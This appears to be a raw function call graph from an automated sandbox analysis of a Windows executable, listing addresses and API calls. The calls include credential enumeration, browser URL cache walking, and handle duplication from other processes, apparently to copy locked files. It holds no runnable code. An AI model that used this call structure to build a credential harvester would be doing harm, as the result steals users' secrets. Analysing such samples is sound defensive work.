38616->38611 38617->38613 38618->38608 38654 40eaff 38619->38654 38623 411ae2 memset 38622->38623 38624 411b8f 38622->38624 38694 409bca GetModuleFileNameW 38623->38694 38636 411a8b 38624->38636 38626 411b0a wcsrchr 38627 411b22 wcscat 38626->38627 38628 411b1f 38626->38628 38695 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 38627->38695 38628->38627 38630 411b67 38696 402afb 38630->38696 38634 411b7f 38752 40ea13 SendMessageW memset SendMessageW 38634->38752 38637 402afb 27 API calls 38636->38637 38638 411ac0 38637->38638 38639 4110dc 38638->38639 38640 41113e 38639->38640 38645 4110f0 38639->38645 38777 40969c LoadCursorW SetCursor 38640->38777 38642 411143 38778 4032b4 38642->38778 38796 444a54 38642->38796 38643 4110f7 _wcsicmp 38643->38645 38644 411157 38646 40ada2 _wcsicmp 38644->38646 38645->38640 38645->38643 38799 410c46 10 API calls 38645->38799 38649 411167 38646->38649 38647 4111af 38649->38647 38650 4111a6 qsort 38649->38650 38650->38647 38653->38460 38655 40eb10 38654->38655 38667 40e8e0 38655->38667 38658 40eb6c memcpy memcpy 38662 40ebb7 38658->38662 38659 40ebf2 ??2@YAPAXI ??2@YAPAXI 38661 40ec2e ??2@YAPAXI 38659->38661 38664 40ec65 38659->38664 38660 40d134 16 API calls 38660->38662 38661->38664 38662->38658 38662->38659 38662->38660 38664->38664 38677 40ea7f 38664->38677 38666 402f49 38666->38460 38668 40e8f2 38667->38668 38669 40e8eb ??3@YAXPAX 38667->38669 38670 40e900 38668->38670 38671 40e8f9 ??3@YAXPAX 38668->38671 38669->38668 38672 40e911 38670->38672 38673 40e90a ??3@YAXPAX 38670->38673 38671->38670 38674 40e931 ??2@YAPAXI ??2@YAPAXI 38672->38674 38675 40e921 ??3@YAXPAX 38672->38675 38676 40e92a ??3@YAXPAX 38672->38676 38673->38672 38674->38658 38675->38676 38676->38674 38678 40aa04 free 38677->38678 38679 40ea88 38678->38679 38680 40aa04 free 38679->38680 38681 40ea90 38680->38681 38682 40aa04 free 38681->38682 38683 40ea98 38682->38683 38684 40aa04 free 38683->38684 38685 40eaa0 38684->38685 38686 40a9ce 4 API calls 38685->38686 38687 40eab3 38686->38687 38688 40a9ce 4 API calls 38687->38688 38689 40eabd 38688->38689 38690 40a9ce 4 API calls 38689->38690 38691 40eac7 38690->38691 38692 40a9ce 4 API calls 38691->38692 38693 40ead1 38692->38693 38693->38666 38694->38626 38695->38630 38753 40b2cc 38696->38753 38698 402b0a 38699 40b2cc 27 API calls 38698->38699 38700 402b23 38699->38700 38701 40b2cc 27 API calls 38700->38701 38702 402b3a 38701->38702 38703 40b2cc 27 API calls 38702->38703 38704 402b54 38703->38704 38705 40b2cc 27 API calls 38704->38705 38706 402b6b 38705->38706 38707 40b2cc 27 API calls 38706->38707 38708 402b82 38707->38708 38709 40b2cc 27 API calls 38708->38709 38710 402b99 38709->38710 38711 40b2cc 27 API calls 38710->38711 38712 402bb0 38711->38712 38713 40b2cc 27 API calls 38712->38713 38714 402bc7 38713->38714 38715 40b2cc 27 API calls 38714->38715 38716 402bde 38715->38716 38717 40b2cc 27 API calls 38716->38717 38718 402bf5 38717->38718 38719 40b2cc 27 API calls 38718->38719 38720 402c0c 38719->38720 38721 40b2cc 27 API calls 38720->38721 38722 402c23 38721->38722 38723 40b2cc 27 API calls 38722->38723 38724 402c3a 38723->38724 38725 40b2cc 27 API calls 38724->38725 38726 402c51 38725->38726 38727 40b2cc 27 API calls 38726->38727 38728 402c68 38727->38728 38729 40b2cc 27 API calls 38728->38729 38730 402c7f 38729->38730 38731 40b2cc 27 API calls 38730->38731 38732 402c99 38731->38732 38733 40b2cc 27 API calls 38732->38733 38734 402cb3 38733->38734 38735 40b2cc 27 API calls 38734->38735 38736 402cd5 38735->38736 38737 40b2cc 27 API calls 38736->38737 38738 402cf0 38737->38738 38739 40b2cc 27 API calls 38738->38739 38740 402d0b 38739->38740 38741 40b2cc 27 API calls 38740->38741 38742 402d26 38741->38742 38743 40b2cc 27 API calls 38742->38743 38744 402d3e 38743->38744 38745 40b2cc 27 API calls 38744->38745 38746 402d59 38745->38746 38747 40b2cc 27 API calls 38746->38747 38748 402d78 38747->38748 38749 40b2cc 27 API calls 38748->38749 38750 402d93 38749->38750 38751 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38750->38751 38751->38634 38752->38624 38756 40b58d 38753->38756 38755 40b2d1 38755->38698 38757 40b5a4 GetModuleHandleW FindResourceW 38756->38757 38758 40b62e 38756->38758 38759 40b5c2 LoadResource 38757->38759 38761 40b5e7 38757->38761 38758->38755 38760 40b5d0 SizeofResource LockResource 38759->38760 38759->38761 38760->38761 38761->38758 38769 40afcf 38761->38769 38763 40b608 memcpy 38772 40b4d3 memcpy 38763->38772 38765 40b61e 38773 40b3c1 18 API calls 38765->38773 38767 40b626 38774 40b04b 38767->38774 38770 40b04b ??3@YAXPAX 38769->38770 38771 40afd7 ??2@YAPAXI 38770->38771 38771->38763 38772->38765 38773->38767 38775 40b051 ??3@YAXPAX 38774->38775 38776 40b05f 38774->38776 38775->38776 38776->38758 38777->38642 38779 4032c4 38778->38779 38780 40b633 free 38779->38780 38781 403316 38780->38781 38800 44553b 38781->38800 38785 403480 38998 40368c 15 API calls 38785->38998 38787 403489 38788 40b633 free 38787->38788 38789 403495 38788->38789 38789->38644 38790 4033a9 memset memcpy 38791 4033ec wcscmp 38790->38791 38792 40333c 38790->38792 38791->38792 38792->38785 38792->38790 38792->38791 38996 4028e7 11 API calls 38792->38996 38997 40f508 6 API calls 38792->38997 38794 403421 _wcsicmp 38794->38792 38797 444a64 FreeLibrary 38796->38797 38798 444a83 38796->38798 38797->38798 38798->38644 38799->38645 38801 445548 38800->38801 38802 445599 38801->38802 38999 40c768 38801->38999 38803 4455a8 memset 38802->38803 38946 4457f2 38802->38946 39082 403988 38803->39082 38810 445854 38811 4458aa 38810->38811 39207 403c9c memset memset memset memset memset 38810->39207 38813 44594a 38811->38813 38814 4458bb memset memset 38811->38814 38812 445672 39093 403fbe memset memset memset memset memset 38812->39093 38816 4459ed 38813->38816 38817 44595e memset memset 38813->38817 38819 414c2e 16 API calls 38814->38819 38822 445a00 memset memset 38816->38822 38823 445b22 38816->38823 38824 414c2e 16 API calls 38817->38824 38818 4455e5 38818->38812 38836 44560f 38818->38836 38825 4458f9 38819->38825 39230 414c2e 38822->39230 38828 445bca 38823->38828 38829 445b38 memset memset memset 38823->38829 38834 44599c 38824->38834 38835 40b2cc 27 API calls 38825->38835 38846 445c8b memset memset 38828->38846 38896 445cf0 38828->38896 38841 445bd4 38829->38841 38842 445b98 38829->38842 38830 445849 39295 40b1ab free free 38830->39295 38845 40b2cc 27 API calls 38834->38845 38847 445909 38835->38847 38838 4087b3 338 API calls 38836->38838 38857 445621 38838->38857 38840 44589f 39296 40b1ab free free 38840->39296 38854 414c2e 16 API calls 38841->38854 38842->38841 38850 445ba2 38842->38850 38859 4459ac 38845->38859 38848 414c2e 16 API calls 38846->38848 38856 409d1f 6 API calls 38847->38856 38860 445cc9 38848->38860 39368 4099c6 wcslen 38850->39368 38851 4456b2 39283 40b1ab free free 38851->39283 38853 40b2cc 27 API calls 38863 445a4f 38853->38863 38865 445be2 38854->38865 38855 403335 38995 4452e5 45 API calls 38855->38995 38868 445919 38856->38868 39281 4454bf 20 API calls 38857->39281 38858 445823 38858->38830 38876 4087b3 338 API calls 38858->38876 38869 409d1f 6 API calls 38859->38869 38870 409d1f 6 API calls 38860->38870 38861 445879 38861->38840 38880 4087b3 338 API calls 38861->38880 39245 409d1f wcslen wcslen 38863->39245 38874 40b2cc 27 API calls 38865->38874 38866 445d3d 38894 40b2cc 27 API calls 38866->38894 38867 445d88 memset memset memset 38877 414c2e 16 API calls 38867->38877 39297 409b98 GetFileAttributesW 38868->39297 38878 4459bc 38869->38878 38879 445ce1 38870->38879 38871 445bb3 39371 445403 memset 38871->39371 38872 445680 38872->38851 39116 4087b3 memset 38872->39116 38883 445bf3 38874->38883 38876->38858 38886 445dde 38877->38886 39364 409b98 GetFileAttributesW 38878->39364 39388 409b98 GetFileAttributesW 38879->39388 38880->38861 38893 409d1f 6 API calls 38883->38893 38884 445928 38884->38813 39298 40b6ef 38884->39298 38895 40b2cc 27 API calls 38886->38895 38888 4459cb 38888->38816 38905 40b6ef 252 API calls 38888->38905 38892 40b2cc 27 API calls 38898 445a94 38892->38898 38900 445c07 38893->38900 38901 445d54 _wcsicmp 38894->38901 38904 445def 38895->38904 38896->38855 38896->38866 38896->38867 38897 445389 258 API calls 38897->38828 39250 40ae18 38898->39250 38899 44566d 38899->38946 39167 413d4c 38899->39167 38908 445389 258 API calls 38900->38908 38909 445d71 38901->38909 38972 445d67 38901->38972 38903 445665 39282 40b1ab free free 38903->39282 38910 409d1f 6 API calls 38904->38910 38905->38816 38913 445c17 38908->38913 39389 445093 23 API calls 38909->39389 38916 445e03 38910->38916 38912 4456d8 38918 40b2cc 27 API calls 38912->38918 38919 40b2cc 27 API calls 38913->38919 38915 44563c 38915->38903 38921 4087b3 338 API calls 38915->38921 39390 409b98 GetFileAttributesW 38916->39390 38917 40b6ef 252 API calls 38917->38855 38923 4456e2 38918->38923 38924 445c23 38919->38924 38920 445d83 38920->38855 38921->38915 39284 413fa6 _wcsicmp _wcsicmp 38923->39284 38928 409d1f 6 API calls 38924->38928 38926 445e12 38929 445e6b 38926->38929 38933 40b2cc 27 API calls 38926->38933 38931 445c37 38928->38931 39392 445093 23 API calls 38929->39392 38930 4456eb 38936 4456fd memset memset memset memset 38930->38936 38937 4457ea 38930->38937 38938 445389 258 API calls 38931->38938 38932 445b17 39365 40aebe 38932->39365 38940 445e33 38933->38940 39285 409c70 wcscpy wcsrchr 38936->39285 39288 413d29 38937->39288 38944 445c47 38938->38944 38945 409d1f 6 API calls 38940->38945 38942 445e7e 38947 445f67 38942->38947 38950 40b2cc 27 API calls 38944->38950 38951 445e47 38945->38951 38946->38810 39184 403e2d memset memset memset memset memset 38946->39184 38952 40b2cc 27 API calls 38947->38952 38948 445ab2 memset 38953 40b2cc 27 API calls 38948->38953 38955 445c53 38950->38955 39391 409b98 GetFileAttributesW 38951->39391 38957 445f73 38952->38957 38958 445aa1 38953->38958 38954 409c70 2 API calls 38959 44577e 38954->38959 38960 409d1f 6 API calls 38955->38960 38962 409d1f 6 API calls 38957->38962 38958->38932 38958->38948 38963 409d1f 6 API calls 38958->38963 39257 40add4 38958->39257 39262 445389 38958->39262 39271 40ae51 38958->39271 38964 409c70 2 API calls 38959->38964 38965 445c67 38960->38965 38961 445e56 38961->38929 38969 445e83 memset 38961->38969 38966 445f87 38962->38966 38963->38958 38967 44578d 38964->38967 38968 445389 258 API calls 38965->38968 39395 409b98 GetFileAttributesW 38966->39395 38967->38937 38974 40b2cc 27 API calls 38967->38974 38968->38828 38973 40b2cc 27 API calls 38969->38973 38972->38855 38972->38917 38975 445eab 38973->38975 38976 4457a8 38974->38976 38977 409d1f 6 API calls 38975->38977 38978 409d1f 6 API calls 38976->38978 38980 445ebf 38977->38980 38979 4457b8 38978->38979 39287 409b98 GetFileAttributesW 38979->39287 38982 40ae18 9 API calls 38980->38982 38986 445ef5 38982->38986 38983 4457c7 38983->38937 38984 40ae51 9 API calls 38984->38986 38986->38984 38987 445f5c 38986->38987 38989 40add4 2 API calls 38986->38989 38990 40b2cc 27 API calls 38986->38990 38991 409d1f 6 API calls 38986->38991 38993 445f3a 38986->38993 39393 409b98 GetFileAttributesW 38986->39393 38988 40aebe FindClose 38987->38988 38988->38947 38989->38986 38990->38986 38991->38986 39394 445093 23 API calls 38993->39394 38995->38792 38996->38794 38997->38792 38998->38787 39000 40c775 38999->39000 39396 40b1ab free free 39000->39396 39002 40c788 39397 40b1ab free free 39002->39397 39004 40c790 39398 40b1ab free free 39004->39398 39006 40c798 39007 40aa04 free 39006->39007 39008 40c7a0 39007->39008 39399 40c274 memset 39008->39399 39013 40a8ab 9 API calls 39014 40c7c3 39013->39014 39015 40a8ab 9 API calls 39014->39015 39016 40c7d0 39015->39016 39428 40c3c3 39016->39428 39020 40c877 39029 40bdb0 39020->39029 39021 40c86c 39470 4053fe 39 API calls 39021->39470 39027 40c7e5 39027->39020 39027->39021 39028 40c634 49 API calls 39027->39028 39453 40a706 39027->39453 39028->39027 39663 404363 39029->39663 39032 40bf5d 39683 40440c 39032->39683 39034 40bdee 39034->39032 39037 40b2cc 27 API calls 39034->39037 39035 40bddf CredEnumerateW 39035->39034 39038 40be02 wcslen 39037->39038 39038->39032 39049 4135f7 39083 40399d 39082->39083 39729 403a16 39083->39729 39086 403a12 wcsrchr 39086->38818 39089 4039a3 39090 4039f4 39089->39090 39092 403a09 39089->39092 39740 40a02c CreateFileW 39089->39740 39091 4099c6 2 API calls 39090->39091 39090->39092 39091->39092 39743 40b1ab free free 39092->39743 39094 414c2e 16 API calls 39093->39094 39095 404048 39094->39095 39096 414c2e 16 API calls 39095->39096 39097 404056 39096->39097 39098 409d1f 6 API calls 39097->39098 39099 404073 39098->39099 39100 409d1f 6 API calls 39099->39100 39101 40408e 39100->39101 39102 409d1f 6 API calls 39101->39102 39103 4040a6 39102->39103 39104 403af5 20 API calls 39103->39104 39105 4040ba 39104->39105 39106 403af5 20 API calls 39105->39106 39107 4040cb 39106->39107 39770 40414f memset 39107->39770 39109 404140 39784 40b1ab free free 39109->39784 39110 4040ec memset 39114 4040e0 39110->39114 39112 404148 39112->38872 39113 4099c6 2 API calls 39113->39114 39114->39109 39114->39110 39114->39113 39115 40a8ab 9 API calls 39114->39115 39115->39114 39797 40a6e6 WideCharToMultiByte 39116->39797 39118 4087ed 39168 40b633 free 39167->39168 39169 413d65 CreateToolhelp32Snapshot memset Process32FirstW 39168->39169 39170 413f00 Process32NextW 39169->39170 39171 413da5 OpenProcess 39170->39171 39172 413f17 CloseHandle 39170->39172 39173 413eb0 39171->39173 39174 413df3 memset 39171->39174 39172->38912 39173->39170 39176 413ebf free 39173->39176 39177 4099f4 3 API calls 39173->39177 40036 413f27 39174->40036 39176->39173 39177->39173 39179 413e37 GetModuleHandleW 39180 413e1f 39179->39180 39181 413e46 GetProcAddress 39179->39181 39180->39179 40041 413959 39180->40041 40057 413ca4 39180->40057 39181->39180 39183 413ea2 CloseHandle 39183->39173 39185 414c2e 16 API calls 39184->39185 39186 403eb7 39185->39186 39187 414c2e 16 API calls 39186->39187 39188 403ec5 39187->39188 39189 409d1f 6 API calls 39188->39189 39190 403ee2 39189->39190 39191 409d1f 6 API calls 39190->39191 39192 403efd 39191->39192 39193 409d1f 6 API calls 39192->39193 39194 403f15 39193->39194 39195 403af5 20 API calls 39194->39195 39196 403f29 39195->39196 39197 403af5 20 API calls 39196->39197 39198 403f3a 39197->39198 39199 40414f 33 API calls 39198->39199 39205 403f4f 39199->39205 39200 403faf 40071 40b1ab free free 39200->40071 39202 403f5b memset 39202->39205 39203 403fb7 39203->38858 39204 4099c6 2 API calls 39204->39205 39205->39200 39205->39202 39205->39204 39206 40a8ab 9 API calls 39205->39206 39206->39205 39208 414c2e 16 API calls 39207->39208 39209 403d26 39208->39209 39210 414c2e 16 API calls 39209->39210 39211 403d34 39210->39211 39212 409d1f 6 API calls 39211->39212 39213 403d51 39212->39213 39214 409d1f 6 API calls 39213->39214 39215 403d6c 39214->39215 39216 409d1f 6 API calls 39215->39216 39217 403d84 39216->39217 39218 403af5 20 API calls 39217->39218 39219 403d98 39218->39219 39220 403af5 20 API calls 39219->39220 39221 403da9 39220->39221 39222 40414f 33 API calls 39221->39222 39228 403dbe 39222->39228 39223 403e1e 40072 40b1ab free free 39223->40072 39224 403dca memset 39224->39228 39226 403e26 39226->38861 39227 4099c6 2 API calls 39227->39228 39228->39223 39228->39224 39228->39227 39229 40a8ab 9 API calls 39228->39229 39229->39228 39231 414b81 9 API calls 39230->39231 39232 414c40 39231->39232 39233 414c73 memset 39232->39233 40073 409cea 39232->40073 39237 414c94 39233->39237 39236 414c64 39236->38853 40076 414592 RegOpenKeyExW 39237->40076 39239 414cc1 39240 414cf4 wcscpy 39239->39240 40077 414bb0 wcscpy 39239->40077 39240->39236 39242 414cd2 40078 4145ac RegQueryValueExW 39242->40078 39244 414ce9 RegCloseKey 39244->39240 39246 409d43 wcscpy 39245->39246 39248 409d62 39245->39248 39247 409719 2 API calls 39246->39247 39249 409d51 wcscat 39247->39249 39248->38892 39249->39248 39251 40aebe FindClose 39250->39251 39252 40ae21 39251->39252 39253 4099c6 2 API calls 39252->39253 39254 40ae35 39253->39254 39255 409d1f 6 API calls 39254->39255 39256 40ae49 39255->39256 39256->38958 39258 40ade0 39257->39258 39259 40ae0f 39257->39259 39258->39259 39260 40ade7 wcscmp 39258->39260 39259->38958 39260->39259 39261 40adfe wcscmp 39260->39261 39261->39259 39263 40ae18 9 API calls 39262->39263 39269 4453c4 39263->39269 39264 40ae51 9 API calls 39264->39269 39265 4453f3 39266 40aebe FindClose 39265->39266 39268 4453fe 39266->39268 39267 40add4 2 API calls 39267->39269 39268->38958 39269->39264 39269->39265 39269->39267 39270 445403 253 API calls 39269->39270 39270->39269 39272 40ae7b FindNextFileW 39271->39272 39273 40ae5c FindFirstFileW 39271->39273 39274 40ae8f 39272->39274 39275 40ae94 39272->39275 39273->39275 39276 40aebe FindClose 39274->39276 39277 40aeb6 39275->39277 39278 409d1f 6 API calls 39275->39278 39276->39275 39277->38958 39278->39277 39281->38915 39282->38899 39283->38899 39284->38930 39286 409c89 39285->39286 39286->38954 39287->38983 39289 413d39 39288->39289 39290 413d2f FreeLibrary 39288->39290 39291 40b633 free 39289->39291 39290->39289 39292 413d42 39291->39292 39293 40b633 free 39292->39293 39294 413d4a 39293->39294 39294->38946 39295->38810 39296->38811 39297->38884 39299 44db70 39298->39299 39300 40b6fc memset 39299->39300 39301 409c70 2 API calls 39300->39301 39302 40b732 wcsrchr 39301->39302 39303 40b743 39302->39303 39304 40b746 memset 39302->39304 39303->39304 39305 40b2cc 27 API calls 39304->39305 39306 40b76f 39305->39306 39307 409d1f 6 API calls 39306->39307 39308 40b783 39307->39308 40079 409b98 GetFileAttributesW 39308->40079 39310 40b792 39311 409c70 2 API calls 39310->39311 39325 40b7c2 39310->39325 39313 40b7a5 39311->39313 39315 40b2cc 27 API calls 39313->39315 39319 40b7b2 39315->39319 39316 40b837 CloseHandle 39318 40b83e memset 39316->39318 39317 40b817 40114 409a45 GetTempPathW 39317->40114 40113 40a6e6 WideCharToMultiByte 39318->40113 39323 409d1f 6 API calls 39319->39323 39321 40b827 CopyFileW 39321->39318 39323->39325 39324 40b866 39326 444432 121 API calls 39324->39326 40080 40bb98 39325->40080 39327 40b879 39326->39327 39328 40bad5 39327->39328 39329 40b273 27 API calls 39327->39329 39330 40baeb 39328->39330 39331 40bade DeleteFileW 39328->39331 39332 40b89a 39329->39332 39333 40b04b ??3@YAXPAX 39330->39333 39331->39330 39334 438552 134 API calls 39332->39334 39335 40baf3 39333->39335 39336 40b8a4 39334->39336 39335->38813 39337 40bacd 39336->39337 39339 4251c4 137 API calls 39336->39339 39338 443d90 111 API calls 39337->39338 39338->39328 39362 40b8b8 39339->39362 39340 40bac6 40126 424f26 123 API calls 39340->40126 39341 40b8bd memset 40117 425413 17 API calls 39341->40117 39344 425413 17 API calls 39344->39362 39347 40a71b MultiByteToWideChar 39347->39362 39348 40a734 MultiByteToWideChar 39348->39362 39351 40b9b5 memcmp 39351->39362 39352 4099c6 2 API calls 39352->39362 39353 404423 37 API calls 39353->39362 39356 40bb3e memset memcpy 40127 40a734 MultiByteToWideChar 39356->40127 39357 4251c4 137 API calls 39357->39362 39359 40bb88 LocalFree 39359->39362 39362->39340 39362->39341 39362->39344 39362->39347 39362->39348 39362->39351 39362->39352 39362->39353 39362->39356 39362->39357 39363 40ba5f memcmp 39362->39363 40118 4253ef 16 API calls 39362->40118 40119 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 39362->40119 40120 4253af 17 API calls 39362->40120 40121 4253cf 17 API calls 39362->40121 40122 447280 memset 39362->40122 40123 447960 memset memcpy memcpy memcpy 39362->40123 40124 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 39362->40124 40125 447920 memcpy memcpy memcpy 39362->40125 39363->39362 39364->38888 39366 40aed1 39365->39366 39367 40aec7 FindClose 39365->39367 39366->38823 39367->39366 39369 4099d7 39368->39369 39370 4099da memcpy 39368->39370 39369->39370 39370->38871 39372 40b2cc 27 API calls 39371->39372 39373 44543f 39372->39373 39374 409d1f 6 API calls 39373->39374 39375 44544f 39374->39375 40216 409b98 GetFileAttributesW 39375->40216 39377 445476 39380 40b2cc 27 API calls 39377->39380 39378 44545e 39378->39377 39379 40b6ef 252 API calls 39378->39379 39379->39377 39381 445482 39380->39381 39382 409d1f 6 API calls 39381->39382 39383 445492 39382->39383 40217 409b98 GetFileAttributesW 39383->40217 39385 4454a1 39386 4454b9 39385->39386 39387 40b6ef 252 API calls 39385->39387 39386->38897 39387->39386 39388->38896 39389->38920 39390->38926 39391->38961 39392->38942 39393->38986 39394->38986 39395->38972 39396->39002 39397->39004 39398->39006 39400 414c2e 16 API calls 39399->39400 39401 40c2ae 39400->39401 39471 40c1d3 39401->39471 39406 40c3be 39423 40a8ab 39406->39423 39407 40afcf 2 API calls 39408 40c2fd FindFirstUrlCacheEntryW 39407->39408 39409 40c3b6 39408->39409 39410 40c31e wcschr 39408->39410 39411 40b04b ??3@YAXPAX 39409->39411 39412 40c331 39410->39412 39413 40c35e FindNextUrlCacheEntryW 39410->39413 39411->39406 39414 40a8ab 9 API calls 39412->39414 39413->39410 39415 40c373 GetLastError 39413->39415 39418 40c33e wcschr 39414->39418 39416 40c3ad FindCloseUrlCache 39415->39416 39417 40c37e 39415->39417 39416->39409 39419 40afcf 2 API calls 39417->39419 39418->39413 39420 40c34f 39418->39420 39421 40c391 FindNextUrlCacheEntryW 39419->39421 39422 40a8ab 9 API calls 39420->39422 39421->39410 39421->39416 39422->39413 39587 40a97a 39423->39587 39426 40a8cc 39426->39013 39593 40b1ab free free 39428->39593 39430 40c3dd 39431 40b2cc 27 API calls 39430->39431 39432 40c3e7 39431->39432 39594 414592 RegOpenKeyExW 39432->39594 39434 40c3f4 39435 40c50e 39434->39435 39436 40c3ff 39434->39436 39450 405337 39435->39450 39437 40a9ce 4 API calls 39436->39437 39438 40c418 memset 39437->39438 39595 40aa1d 39438->39595 39441 40c471 39443 40c47a _wcsupr 39441->39443 39442 40c505 RegCloseKey 39442->39435 39597 40a8d0 7 API calls 39443->39597 39445 40c498 39598 40a8d0 7 API calls 39445->39598 39447 40c4ac memset 39448 40aa1d 39447->39448 39449 40c4e4 RegEnumValueW 39448->39449 39449->39442 39449->39443 39599 405220 39450->39599 39454 4099c6 2 API calls 39453->39454 39455 40a714 _wcslwr 39454->39455 39456 40c634 39455->39456 39656 405361 39456->39656 39459 40c65c wcslen 39659 4053b6 39 API calls 39459->39659 39460 40c71d wcslen 39460->39027 39462 40c677 39463 40c713 39462->39463 39660 40538b 39 API calls 39462->39660 39662 4053df 39 API calls 39463->39662 39470->39020 39472 40ae18 9 API calls 39471->39472 39478 40c210 39472->39478 39473 40ae51 9 API calls 39473->39478 39474 40c264 39475 40aebe FindClose 39474->39475 39477 40c26f 39475->39477 39476 40add4 2 API calls 39476->39478 39483 40e5ed memset memset 39477->39483 39478->39473 39478->39474 39478->39476 39479 40c231 _wcsicmp 39478->39479 39480 40c1d3 35 API calls 39478->39480 39479->39478 39481 40c248 39479->39481 39480->39478 39496 40c084 22 API calls 39481->39496 39484 414c2e 16 API calls 39483->39484 39485 40e63f 39484->39485 39486 409d1f 6 API calls 39485->39486 39487 40e658 39486->39487 39497 409b98 GetFileAttributesW 39487->39497 39489 40e667 39490 40e680 39489->39490 39491 409d1f 6 API calls 39489->39491 39498 409b98 GetFileAttributesW 39490->39498 39491->39490 39493 40e68f 39495 40c2d8 39493->39495 39499 40e4b2 39493->39499 39495->39406 39495->39407 39496->39478 39497->39489 39498->39493 39520 40e01e 39499->39520 39501 40e593 39502 40e5b0 39501->39502 39503 40e59c DeleteFileW 39501->39503 39505 40b04b ??3@YAXPAX 39502->39505 39503->39502 39504 40e521 39504->39501 39543 40e175 39504->39543 39506 40e5bb 39505->39506 39508 40e5c4 CloseHandle 39506->39508 39509 40e5cc 39506->39509 39508->39509 39511 40b633 free 39509->39511 39510 40e573 39513 40e584 39510->39513 39514 40e57c CloseHandle 39510->39514 39512 40e5db 39511->39512 39516 40b633 free 39512->39516 39586 40b1ab free free 39513->39586 39514->39513 39515 40e540 39515->39510 39563 40e2ab 39515->39563 39518 40e5e3 39516->39518 39518->39495 39521 406214 22 API calls 39520->39521 39522 40e03c 39521->39522 39523 40e16b 39522->39523 39524 40dd85 74 API calls 39522->39524 39523->39504 39525 40e06b 39524->39525 39525->39523 39526 40afcf ??2@YAPAXI ??3@YAXPAX 39525->39526 39527 40e08d OpenProcess 39526->39527 39528 40e0a4 GetCurrentProcess DuplicateHandle 39527->39528 39532 40e152 39527->39532 39529 40e0d0 GetFileSize 39528->39529 39530 40e14a CloseHandle 39528->39530 39533 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 39529->39533 39530->39532 39531 40e160 39535 40b04b ??3@YAXPAX 39531->39535 39532->39531 39534 406214 22 API calls 39532->39534 39536 40e0ea 39533->39536 39534->39531 39535->39523 39537 4096dc CreateFileW 39536->39537 39538 40e0f1 CreateFileMappingW 39537->39538 39539 40e140 CloseHandle CloseHandle 39538->39539 39540 40e10b MapViewOfFile 39538->39540 39539->39530 39541 40e13b CloseHandle 39540->39541 39542 40e11f WriteFile UnmapViewOfFile 39540->39542 39541->39539 39542->39541 39544 40e18c 39543->39544 39545 406b90 11 API calls 39544->39545 39546 40e19f 39545->39546 39547 40e1a7 memset 39546->39547 39548 40e299 39546->39548 39553 40e1e8 39547->39553 39549 4069a3 ??3@YAXPAX free 39548->39549 39550 40e2a4 39549->39550 39550->39515 39551 406e8f 13 API calls 39551->39553 39552 406b53 SetFilePointerEx ReadFile 39552->39553 39553->39551 39553->39552 39554 40e283 39553->39554 39555 40dd50 _wcsicmp 39553->39555 39559 40742e 8 API calls 39553->39559 39560 40aae3 wcslen wcslen _memicmp 39553->39560 39561 40e244 _snwprintf 39553->39561 39556 40e291 39554->39556 39557 40e288 free 39554->39557 39555->39553 39558 40aa04 free 39556->39558 39557->39556 39558->39548 39559->39553 39560->39553 39562 40a8d0 7 API calls 39561->39562 39562->39553 39564 40e2c2 39563->39564 39565 406b90 11 API calls 39564->39565 39585 40e2d3 39565->39585 39566 40e4a0 39567 4069a3 ??3@YAXPAX free 39566->39567 39569 40e4ab 39567->39569 39568 406e8f 13 API calls 39568->39585 39569->39515 39570 406b53 SetFilePointerEx ReadFile 39570->39585 39571 40e489 39572 40aa04 free 39571->39572 39573 40e491 39572->39573 39573->39566 39574 40e497 free 39573->39574 39574->39566 39575 40dd50 _wcsicmp 39575->39585 39576 40dd50 _wcsicmp 39577 40e376 memset 39576->39577 39578 40aa29 6 API calls 39577->39578 39578->39585 39579 40742e 8 API calls 39579->39585 39580 40e3e0 memcpy 39580->39585 39581 40e3b3 wcschr 39581->39585 39582 40e3fb memcpy 39582->39585 39583 40e416 memcpy 39583->39585 39584 40e431 memcpy 39584->39585 39585->39566 39585->39568 39585->39570 39585->39571 39585->39575 39585->39576 39585->39579 39585->39580 39585->39581 39585->39582 39585->39583 39585->39584 39586->39501 39589 40a980 39587->39589 39588 40a8bb 39588->39426 39592 40a8d0 7 API calls 39588->39592 39589->39588 39590 40a995 _wcsicmp 39589->39590 39591 40a99c wcscmp 39589->39591 39590->39589 39591->39589 39592->39426 39593->39430 39594->39434 39596 40aa23 RegEnumValueW 39595->39596 39596->39441 39596->39442 39597->39445 39598->39447 39600 405335 39599->39600 39601 40522a 39599->39601 39600->39027 39602 40b2cc 27 API calls 39601->39602 39603 405234 39602->39603 39604 40a804 8 API calls 39603->39604 39605 40523a 39604->39605 39644 40b273 39605->39644 39607 405248 _mbscpy _mbscat GetProcAddress 39608 40b273 27 API calls 39607->39608 39609 405279 39608->39609 39647 405211 GetProcAddress 39609->39647 39611 405282 39645 40b58d 27 API calls 39644->39645 39646 40b18c 39645->39646 39646->39607 39647->39611 39657 405220 39 API calls 39656->39657 39658 405369 39657->39658 39658->39459 39658->39460 39659->39462 39662->39460 39664 40440c FreeLibrary 39663->39664 39665 40436d 39664->39665 39666 40a804 8 API calls 39665->39666 39667 404377 39666->39667 39668 404383 39667->39668 39669 404405 39667->39669 39670 40b273 27 API calls 39668->39670 39669->39032 39669->39034 39669->39035 39671 40438d GetProcAddress 39670->39671 39672 40b273 27 API calls 39671->39672 39673 4043a7 GetProcAddress 39672->39673 39684 404413 FreeLibrary 39683->39684 39685 40441e 39683->39685 39684->39685 39685->39049 39730 403a29 39729->39730 39744 403bed memset memset 39730->39744 39732 403ae7 39757 40b1ab free free 39732->39757 39733 403a3f memset 39738 403a2f 39733->39738 39735 403aef 39735->39089 39736 409d1f 6 API calls 39736->39738 39737 409b98 GetFileAttributesW 39737->39738 39738->39732 39738->39733 39738->39736 39738->39737 39739 40a8d0 7 API calls 39738->39739 39739->39738 39741 40a051 GetFileTime CloseHandle 39740->39741 39742 4039ca CompareFileTime 39740->39742 39741->39742 39742->39089 39743->39086 39745 414c2e 16 API calls 39744->39745 39746 403c38 39745->39746 39747 409719 2 API calls 39746->39747 39748 403c3f wcscat 39747->39748 39749 414c2e 16 API calls 39748->39749 39750 403c61 39749->39750 39751 409719 2 API calls 39750->39751 39752 403c68 wcscat 39751->39752 39758 403af5 39752->39758 39755 403af5 20 API calls 39756 403c95 39755->39756 39756->39738 